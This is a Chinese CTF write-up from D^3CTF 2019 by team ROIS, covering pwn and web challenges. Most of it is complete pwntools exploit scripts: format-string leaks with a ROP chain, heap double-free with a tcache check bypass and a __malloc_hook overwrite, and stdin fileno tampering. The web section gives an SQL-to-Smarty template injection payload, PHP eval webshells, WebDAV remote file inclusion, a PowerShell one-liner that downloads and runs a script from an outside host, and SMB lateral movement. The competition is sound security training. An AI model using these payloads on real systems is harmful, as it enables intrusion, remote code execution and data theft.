D^3CTF 2019 Writeup By ROIS
感谢 Vidar-Team、L-Team、CNSS 带来的高质量比赛。
Ru7n 师傅太强了,一路带飞
pwn
unprintableV
pwnable.tw上的unprintable魔改,第5版了。。我原先解pwnable.tw上这道题用的是把bss段上的stdout改成了stderr进行了泄露,这次这题也刚刚好用到了这个解法,不过这题禁用了execve,但是可以多次printf也不是什么大问题
一开始断点下在printf(buf)那里,栈的情况
► 0x55b7cd5bfa20 call 0x55b7cd5bf780
0x55b7cd5bfa25 mov eax, dword ptr [rip + 0x2015e5]
0x55b7cd5bfa2b sub eax, 1
0x55b7cd5bfa2e mov dword ptr [rip + 0x2015dc], eax
0x55b7cd5bfa34 nop
0x55b7cd5bfa35 pop rbp
0x55b7cd5bfa36 ret
0x55b7cd5bfa37 push rbp
0x55b7cd5bfa38 mov rbp, rsp
0x55b7cd5bfa3b mov rax, qword ptr [rip + 0x2015de]
0x55b7cd5bfa42 mov ecx, 0
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ rbp rsp 0x7ffcc627f8c0 —▸ 0x7ffcc627f8e0 —▸ 0x7ffcc627f900 —▸ 0x55b7cd5bfb60 ◂— push r15
01:0008│ 0x7ffcc627f8c8 —▸ 0x55b7cd5bfafb ◂— mov edx, 6
02:0010│ 0x7ffcc627f8d0 ◂— 0x7fff000000000006
03:0018│ 0x7ffcc627f8d8 —▸ 0x55b7cd7c1060 ◂— '%216c%6$hhn' //name
04:0020│ 0x7ffcc627f8e0 —▸ 0x7ffcc627f900 —▸ 0x55b7cd5bfb60 ◂— push r15
05:0028│ 0x7ffcc627f8e8 —▸ 0x55b7cd5bfb51 ◂— mov eax, 0
06:0030│ 0x7ffcc627f8f0 —▸ 0x7ffcc627f9e8 —▸ 0x7ffcc62813cd ◂— './unprintableV'
07:0038│ 0x7ffcc627f8f8 ◂— 0x100000000
可以看到有两条这样的链0x7ffcc627f8c0 —▸ 0x7ffcc627f8e0 —▸ 0x7ffcc627f900 —▸ 0x55b7cd5bfb60 ◂— push r15,0x7ffcc627f8f0 —▸ 0x7ffcc627f9e8 —▸ 0x7ffcc62813cd ◂— './unprintableV',而且一开始还给了栈地址,完美啊
所以思路是先让03:0018│ 0x7ffcc627f8d8 —▸ 0x55b7cd7c1060 ◂— '%216c%6$hhn' //name这里指向bss段上的stdout,然后把stdout改为stderr,看脸的时候到了,1/16的概率,注意下就是因为close(1)了,printf大于0x2000的字符数好像写不进去,所以爆破的时候用p16(0x1680)或者p16(0x0680),成功的话printf就可以泄露啦,后面就随便玩了,:P
这次脸超级好,3次成功了两次,有点不太敢相信
exp为:
from pwn import *
context.arch='amd64'
def debug(addr,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
else:
gdb.attach(p,"b *{}".format(hex(addr)))
def main(host,port=10397):
global p
if host:
p = remote(host,port)
else:
p = process("./unprintableV")
# p = process("./pwn",env={"LD_PRELOAD":"./x64_libc.so.6"})
# gdb.attach(p)
debug(0x000000000000A20)
p.recvuntil("gift: ")
stack = int(p.recvuntil('\n',drop=True),16)
info("stack : " + hex(stack))
p.recvuntil("printf test!")
payload = "%{}c%6$hhn".format(stack&0xff)
p.send(payload)
pause()
payload = "%{}c%10$hhn".format(0x20)
p.send(payload)
pause()
payload = "%{}c%9$hn".format(0x1680)
p.send(payload)
pause()
payload = "+%p-%3$p*"
p.send(payload.ljust(0x12c,"\x00"))
p.recvuntil('+')
elf_base = int(p.recvuntil('-',drop=True),16)+0x10
info("elf : " + hex(elf_base))
libc.address = int(p.recvuntil('*',drop=True),16)-0x110081
success('libc : '+hex(libc.address))
pause()
ret_addr = stack-0x20
payload = "%{}c%12$hn".format((stack-0x18)&0xffff)
p.send(payload.ljust(0x12c,"\x00"))
# offset = 43
payload = "%{}c%43$hn".format((elf_base)&0xffff)
p.send(payload.ljust(0x12c,"\x00"))
payload = "%{}c%12$hn".format((stack-0x18+2)&0xffff)
p.send(payload.ljust(0x12c,"\x00"))
# offset = 43
payload = "%{}c%43$hn".format((elf_base>>16)&0xffff)
p.send(payload.ljust(0x12c,"\x00"))
payload = "%{}c%12$hn".format((stack-0x18+4)&0xffff)
p.send(payload.ljust(0x12c,"\x00"))
# offset = 43
payload = "%{}c%43$hn".format((elf_base>>32)&0xffff)
p.send(payload.ljust(0x12c,"\x00"))
payload = "%{}c%12$hn".format(ret_addr&0xffff)
p.send(payload.ljust(0x12c,"\x00"))
# 0x0000000000000bbd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
payload = "%{}c%43$hn".format((elf_base-0x202070+0xbbd)&0xffff)
payload = payload.ljust(0x20,"\x00")
payload += "/flag"+'\x00'*3
# 0x00000000000a17e0: pop rdi; ret;
# 0x0000000000023e6a: pop rsi; ret;
# 0x00000000001306d9: pop rdx; pop rsi; ret;
p_rdi = libc.address+0x00000000000a17e0
p_rsi = libc.address+0x0000000000023e6a
p_rdx_rsi = libc.address+0x00000000001306d9
rop = p64(p_rdi)+p64(elf_base+0x10)+p64(p_rsi)+p64(0)+p64(libc.symbols["open"])
rop += p64(p_rdi)+p64(1)+p64(p_rdx_rsi)+p64(0x100)+p64(elf_base-0x70+0x300)+p64(libc.symbols["read"])
rop += p64(p_rdi)+p64(2)+p64(p_rdx_rsi)+p64(0x100)+p64(elf_base-0x70+0x300)+p64(libc.symbols["write"])
payload += rop
p.send(payload)
p.interactive()
if __name__ == "__main__":
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
# libc = ELF("./x64_libc.so.6",checksec=False)
# elf = ELF("./unprintableV",checksec=False)
main(args['REMOTE'])
babyrop
题目有个简单的指令集,有个简单的栈结构(好像是这样
00000000 stack struc ; (sizeof=0x14, mappedto_6)
00000000 rsp_ dq ?
00000008 rbp_ dq ?
00000010 len dd ?
00000014 stack ends
然后就是指令集里有几个函数有bug
case '(':
++*idx;
if ( !(unsigned int)clear_stack(v7, v6) )// !!!
exit(0);
return result;
case '4':
++*idx;
sub_E17(v7); // !
break;
case '!':
sub_BB9(v7); // !
++*idx;
break;
思路是先两次((让结构体里的rsp_越界
pwndbg> stack 30
00:0000│ rsp 0x7ffef245fbe0 —▸ 0x558692b96148 ◂— 0x2
01:0008│ 0x7ffef245fbe8 —▸ 0x558692b96150 —▸ 0x7ffef245fca0 ◂— 0x11486eca0 !!!!
02:0010│ 0x7ffef245fbf0 —▸ 0x558692b96140 ◂— 0x2
03:0018│ 0x7ffef245fbf8 —▸ 0x558692b96040 ◂— 0x3400000000562828 /* '((V' */
04:0020│ 0x7ffef245fc00 ◂— 0x0
... ↓
0e:0070│ 0x7ffef245fc50 ◂— 0x100000100
0f:0078│ 0x7ffef245fc58 ◂— 0xe11547f75d191800
10:0080│ rbp 0x7ffef245fc60 —▸ 0x7ffef245fc80 —▸ 0x558692995430 ◂— push r15
11:0088│ 0x7ffef245fc68 —▸ 0x558692994977 ◂— mov edi, 0
12:0090│ 0x7ffef245fc70 —▸ 0x7ffef245fd60 ◂— 0x1
13:0098│ 0x7ffef245fc78 ◂— 0xe11547f75d191800
14:00a0│ 0x7ffef245fc80 —▸ 0x558692995430 ◂— push r15
15:00a8│ 0x7ffef245fc88 —▸ 0x7fb21429f830 (__libc_start_main+240) ◂— mov edi, eax
16:00b0│ 0x7ffef245fc90 ◂— 0x1
17:00b8│ 0x7ffef245fc98 —▸ 0x7ffef245fd68 —▸ 0x7ffef246120c ◂— './babyrop'
18:00c0│ 0x7ffef245fca0 ◂— 0x11486eca0
两次((后:01:0008│ 0x7ffef245fbe8 —▸ 0x558692b96150 —▸ 0x7ffef245fca0 ◂— 0x11486eca0 !!!!,可以看到已经越界了
然后就是利用栈上的0x7fb21429f830 (__libc_start_main+240)和那几个有bug的函数进行加加减减,最后把返回地址给改为one_gadget
► 0x558692995428 leave
0x558692995429 ret
↓
0x7fb2142c426a <do_system+1098> mov rax, qword ptr [rip + 0x37ec47]
0x7fb2142c4271 <do_system+1105> lea rdi, [rip + 0x147adf]
exp为:
from pwn import *
context.arch='amd64'
def debug(addr,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
else:
gdb.attach(p,"b *{}".format(hex(addr)))
def main(host,port=17676):
global p
if host:
p = remote(host,port)
else:
p = process("./babyrop")
# gdb.attach(p)
debug(0x000000000000CB2)
payload = "((V"+p32(0)+"44V"+p32(0x24a3a)+"!44444"
p.send(payload.ljust(0x100,"\x00"))
p.interactive()
if __name__ == "__main__":
main(args['REMOTE'])
ezfile
这题在给了hint后,想了很久,然后想起今年国赛有一题是吧stdin的fileno改为666,然后利用scanf和printf把flag打印出来,然后手动试了下这题,居然也可以。
这题有两个漏洞,一个是deleteNote没有把指针置零,一个是encryptNode函数的栈溢出,思路就是利用double free修改stdin->fileno为3,然后利用栈溢出partial overwirte改encryptNode返回地址到
.text:0000000000001147 mov eax, 0
.text:000000000000114C call _open
.text:0000000000001151 mov cs:fd, eax
.text:0000000000001157 mov eax, cs:fd
.text:000000000000115D cmp eax, 0FFFFFFFFh
至于为什么可以open /flag,是因为在encryptNode返回时
RDI 0x7ffce9258610 ◂— 0x67616c662f /* '/flag' */
RSI 0x0
R8 0x7ffce92585f3 ◂— 0x1000000000a /* '\n' */
R9 0x0
R10 0x7f9c58fe5cc0 (_nl_C_LC_CTYPE_class+256) ◂— add al, byte ptr [rax]
R11 0x246
R12 0x55bdf8ef4980 ◂— xor ebp, ebp
R13 0x7ffce9258770 ◂— 0x1
R14 0x0
R15 0x0
RBP 0x7ffce9258670 ◂— 0x0
RSP 0x7ffce9258610 ◂— 0x67616c662f /* '/flag' */
RIP 0x55bdf8ef50e3 ◂— leave
───────────────────────────────────[ DISASM ]───────────────────────────────────
► 0x55bdf8ef50e3 leave
0x55bdf8ef50e4 ret
↓
0x55bdf8ef5147 mov eax, 0
RDI会指向我们输入的内容,RSI就是doSomeThing(seed, index)的index参数,都是可控的,所以跳到open函数可以打开/flag,然后在配合
__isoc99_scanf("%90s", name);
printf("welcome!%s.\n", name);
这样就会把flag打印出来
[*] welcome!d3ctf{3z_FIL3N0~@TT@cK-WIth-ST@Ck_0V3RFI0W}.由于攻击到stdin->fileno我猜了两次地址,一次是堆地址,一次是libc地址,这样就1/256的几率,然后最后栈溢出的patial overwrite又要来一次1/16,所以最后成功几率是1/4096,出题人说还可以更低,orz
exp为:
from pwn import *
context.arch='amd64'
def debug(addr,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
else:
gdb.attach(p,"b *{}".format(hex(addr)))
def cmd(command):
p.recvuntil(">>")
p.sendline(str(command))
def add(sz,content):
cmd(1)
p.recvuntil("size of your note >>")
p.sendline(str(sz))
p.recvuntil("content >>")
p.send(content)
def enc(idx,sz,seed):
cmd(3)
p.sendlineafter("encrypt >>",str(idx))
p.sendlineafter("(max 0x50) >>",str(sz))
p.sendafter("seed >>",seed)
def dele(idx):
cmd(2)
p.sendlineafter("delete >>",str(idx))
def main(host,port=24694):
global p
if host:
p = remote(host,port)
else:
p = process("./ezfile")
# p = process("./pwn",env={"LD_PRELOAD":"./x64_libc.so.6"})
# gdb.attach(p)
debug(0x0000000000010E3)
p.recvuntil("your name: ")
p.sendline("A")
add(0x10,p64(0)+p64(0x21))
add(0x10,p64(0)+p64(0x21))
# t = int(raw_input("guess: "))
t = 11
heap = (t << 12) | 0x00000000000120
# t = int(raw_input("guess: "))
t = 6
stdin_fileno = (t << 12) | 0x00000000000a70
# t = int(raw_input("guess: "))
t = 7
elf = (t << 12) | 0x000000000000147
dele(1)
dele(0)
dele(0)
add(2,p16(heap))
add(0x10,p64(0)+p64(0x21))
add(0x18,p64(0)+p64(0x441)+p64(0))
dele(1)
dele(0)
dele(0)
add(2,p16(heap+0x10))
add(0x10,p64(0)+p64(0x21))
add(0x10,p64(0)*2)
dele(7)
add(2,p16(stdin_fileno))
dele(0)
dele(0)
add(2,p16(heap+0x10))
add(1,"A")
add(1,"A")
add(1,"\x03")
enc(20,0x6a,"/flag"+"\x00"*(0x63)+p16(elf))
p.recvuntil("welcome!",timeout=1)
flag = p.recvuntil('.\n',timeout=1)
info(flag)
p.interactive()
if __name__ == "__main__":
for i in range(0x1000):
try:
main(args['REMOTE'])
except Exception,err:
p.close()
print err
continue
new_heap
libc2.29有对tcache double free 进行check,这很蛋疼
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache)) //如果我们可以把e->key即chunk的bk指针修改掉,那就可以绕过这个check
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
if (tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
}
#endif
题目就只有add和dele功能,dele没清空指针,但是由于有这个check在,有点难受,而且只能add18次,想了很久很久,在快结束的前几个小时试了下功能3就是退出那个函数,发现报错了(堆块重叠了导致报错),报的是malloc_consolidate的错,瞬间觉得有希望了,原因是
void init_()
{
void *ptr; // ST08_8
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
alarm(0x1Eu);
ptr = malloc(0x1000uLL);
printf("good present for African friends:0x%x\n", (unsigned int)(((unsigned __int16)ptr & 0xFF00) >> 8));
free(ptr);
}
这里开始的初始话没有setbuf(stdin,0),于是乎在getchar的时候会再堆上申请一个0x1000大小的缓冲区,这样就不用浪费add的次数去申请一个大堆块,再配合题目的dele函数,就可以在限定次数下完成利用
先是
for i in range(8):
add(0x78,"\x00"*0x78)
for i in range(7):
dele(i)
dele(7) #fastbin
cmd(3)
p.recvuntil("sure?")
p.send("0")
这样chunk7被malloc_consolidate合并,然后在add(0x68,"\x00"*0x68)一下,以防释放那个缓冲区的时候和top_chunk合并
wndbg> telescope 0x5625febf8060 18
00:0000│ 0x5625febf8060 —▸ 0x5625fec6a260 ◂— 0x0
01:0008│ 0x5625febf8068 —▸ 0x5625fec6a2e0 —▸ 0x5625fec6a260 ◂— 0x0
02:0010│ 0x5625febf8070 —▸ 0x5625fec6a360 —▸ 0x5625fec6a2e0 —▸ 0x5625fec6a260 ◂— 0x0
03:0018│ 0x5625febf8078 —▸ 0x5625fec6a3e0 —▸ 0x5625fec6a360 —▸ 0x5625fec6a2e0 —▸ 0x5625fec6a260 ◂— ...
04:0020│ 0x5625febf8080 —▸ 0x5625fec6a460 —▸ 0x5625fec6a3e0 —▸ 0x5625fec6a360 —▸ 0x5625fec6a2e0 ◂— ...
05:0028│ 0x5625febf8088 —▸ 0x5625fec6a4e0 —▸ 0x5625fec6a460 —▸ 0x5625fec6a3e0 —▸ 0x5625fec6a360 ◂— ...
06:0030│ 0x5625febf8090 —▸ 0x5625fec6a560 —▸ 0x5625fec6a4e0 —▸ 0x5625fec6a460 —▸ 0x5625fec6a3e0 ◂— ...
07:0038│ 0x5625febf8098 —▸ 0x5625fec6a5e0 ◂— 0x30 /* '0' */
08:0040│ 0x5625febf80a0 —▸ 0x5625fec6b5f0 ◂— 0x0
09:0048│ 0x5625febf80a8 ◂— 0x0
... ↓
pwndbg> telescope 0x5625fec6a5d0
00:0000│ 0x5625fec6a5d0 ◂— 0x0
01:0008│ 0x5625fec6a5d8 ◂— 0x1011
02:0010│ 0x5625fec6a5e0 ◂— 0x30 /* '0' */
03:0018│ 0x5625fec6a5e8 ◂— 0x0
... ↓
我们可以看到chunk7和getchar申请的缓冲区重叠,也正是如此,我们可以利用getchar来修改chunk7的bk指针,然后就是
dele(7)
add(0x68,"\x00"*0x68)
dele(7)
cmd(3)
p.recvuntil("sure?")
p.send("\x00"*0xe)
dele(7)
可以看到成功double free,堆上也有了libc的指针
tcachebins
0x70 [ 2]: 0x55e3221f45e0 ◂— 0x55e3221f45e0
0x80 [ 7]: 0x55e3221f4560 —▸ 0x55e3221f44e0 —▸ 0x55e3221f4460 —▸ 0x55e3221f43e0 —▸ 0x55e3221f4360 —▸ 0x55e3221f42e0 —▸ 0x55e3221f4260 ◂— 0x0
unsortedbin
all: 0x55e3221f4640 —▸ 0x7f6ba8af9ca0 (main_arena+96) ◂— 0x55e3221f4640
后面就是泄露libc和getshell了,要注意add的次数就好,泄露的时候还是有点看脸,不过1/16的几率多跑几次就好
exp为:
from pwn import *
def cmd(c):
p.recvuntil("3.exit")
p.sendline(str(c))
def add(sz,content):
cmd(1)
p.recvuntil("size:")
p.sendline(str(sz))
p.recvuntil("content:")
p.send(content)
def dele(idx):
cmd(2)
p.recvuntil("index:")
p.sendline(str(idx))
def main(host,port=20508):
global p
if host:
p = remote(host,port)
else:
# p = process("./new_heap")
p = process("./new_heap",env={"LD_PRELOAD":"./libc.so.6"})
gdb.attach(p)
p.recvuntil("friends:")
heap = (int(p.recvuntil("\n",drop=True),16)>>4)<<12
for i in range(8):
add(0x78,"\x00"*0x78)
for i in range(7):
dele(i)
dele(7)
cmd(3)
p.recvuntil("sure?")
p.send("0")
add(0x68,"\x00"*0x68)
dele(7)
add(0x68,"\x00"*0x68)
dele(7)
cmd(3)
p.recvuntil("sure?")
p.send("\x00"*0xe)
guess = int(raw_input("guess?"))
# guess = 7
stdout = (guess << 12) | 0x760
add(0x58,p16(stdout-0x10))
dele(7)
add(0x68,p16(heap+0x650))
add(0x68,"\x00"*0x68)
add(0x68,"\x00"*0x68)
add(0x68,b"\x00"*0x10+p64(0xfbad1800)+p64(0)*3+b'\x00')
p.recv(8)
libc.address = u64(p.recv(8))-0x3b5890
success('libc : '+hex(libc.address))
dele(7)
for i in range(13):
cmd(3)
cmd(3)
p.recvuntil("sure?")
p.send(p64(libc.symbols["__malloc_hook"]-0x23))
add(0x68,"\x00"*0x68)
add(0x68,b"\x00"*0x13+p64(libc.address+0xdf212))
cmd(1)
p.recvuntil("size:")
p.sendline(str(0))
p.interactive()
if __name__ == "__main__":
libc = ELF("./libc.so.6",checksec=False)
main(args["REMOTE"])
web
平台进不去,之前忘记截图,就只写一下大致思路吧。
easyweb
题目很简洁,有登录注册,还有个莫名其妙的上传,对文件没有任何限制,但是直接传到 /tmp 下了,而且过滤了 ..。
Profile 处有显示出用户名,可能存在二次注入。另外,渲染用的是 smarty。
Hi, wywwzjj, hope you have a good experience in this ctf game
you must get a RCE Bug in this challenge
可看到注册时用户名、密码都没有经过任何处理,取出来时有简单过滤,很好绕。
jkl2' uni{on se{lect 233#
要想打出模板注入还是麻烦点,过滤掉了 {},这里卡了一下。
既然都能执行 SQL,为何不利用一下呢?
uni{on sel{lect 0x7b7b7068707d7d6576616c28245f4745545b315d293b7b7b2f7068707d7d#
看到 flag 还是震惊了一下,pop chain???
fakeonelinephp
随手一试:
Warning: include(): data:// wrapper is disabled in the server configuration by allow_url_include=0 in C:\Users\w1nd\Desktop\web\nginx-1.17.6\html\index.php on line 1
Warning: include(data://...@<?php): failed to open stream: no suitable wrapper could be found in C:\Users\w1nd\Desktop\web\nginx-1.17.6\html\index.php on line 1
Warning: include(): Failed opening 'data://...@<?php' for inclusion (include_path='.;C:\Users\Public\Videos;\c:\php\includes;c:\php\pear;') in C:\Users\w1nd\Desktop\web\nginx-1.17.6\html\index.php on line 1
扫目录看到了 .git,以及 /webdav,想起曾经有人提过 webdav 打 RFI 的姿势。
docker run -v ~/webdav:/var/lib/dav -e ANONYMOUS_METHODS=GET,OPTIONS,PROPFIND -e LOCATION=/webdav -p 80:80 --rm --name webdav bytemark/webdav
到这一步就能 RCE 了,不过 flag 还在里头呢。
Windows NT 172_19_97_4 10.0 build 14393 (Windows Server 2016) AMD64包含 shell 的时候遇到一点麻烦,估计是 Defender 之类的安全软件在作祟,干掉了 $_POST[] 这种形式的,那就
@<?php eval($_POST{1});
@<?php eval(base64_decode(编码一个eval));
socks5 代理一直出不来,直接搞个 powshell 进行了一下端口扫描。
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://vps/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 172.19.97.8
得到结果:
Hostname : 172.19.97.8
alive : True
openPorts : {3389, 445, 139, 135}
closedPorts : {443, 23, 646, 3306...}
filteredPorts : {80}
finishTime : 11/24/2019 11:48:02 AM队友尝试爆了下 3389,没成功,我搭了下车,拿其他师傅传的 hydra 直接爆 445 居然成功了。
结合之前的提示,然后就是利用 smb。
net use \\172.19.97.8\C$
type \\172.19.97.8\C$\Users\Administrator\Desktop\flag.txt
转载
分享
0 条评论
可输入 255 字
发布投稿
